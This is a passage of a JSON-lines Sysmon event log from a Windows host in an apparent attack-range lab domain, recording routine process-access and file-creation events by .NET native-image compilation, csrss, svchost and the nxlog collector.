(x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:49.274\r\nProcessGuid: {E2A3D6B1-12E4-5F25-0000-0010761E0A00}\r\nProcessId: 3788\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ecc-0\\System.Management.dll\r\nCreationUtcTime: 2020-08-01 06:59:49.274","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:49.274","ProcessGuid":"{E2A3D6B1-12E4-5F25-0000-0010761E0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ecc-0\\System.Management.dll","CreationUtcTime":"2020-08-01 06:59:49.274","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.321\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00102F220A00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.321","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00102F220A00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.321\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00102F220A00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.321","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00102F220A00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.337\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00102F220A00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.337","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-00102F220A00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.352\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-001011250A00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.352","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-001011250A00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.352\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-001011250A00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.352","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-001011250A00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.368\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-001011250A00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:49.368","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E5-5F25-0000-001011250A00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:49.415\r\nProcessGuid: {E2A3D6B1-12E5-5F25-0000-001011250A00}\r\nProcessId: 4772\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12a4-0\\Accessibility.dll\r\nCreationUtcTime: 2020-08-01 06:59:49.415","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:49.415","ProcessGuid":"{E2A3D6B1-12E5-5F25-0000-001011250A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12a4-0\\Accessibility.dll","CreationUtcTime":"2020-08-01 06:59:49.415","EventReceivedTime":"2020-08-01 06:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:49.446\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E5-5F25-0000-00103D280A00}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.3031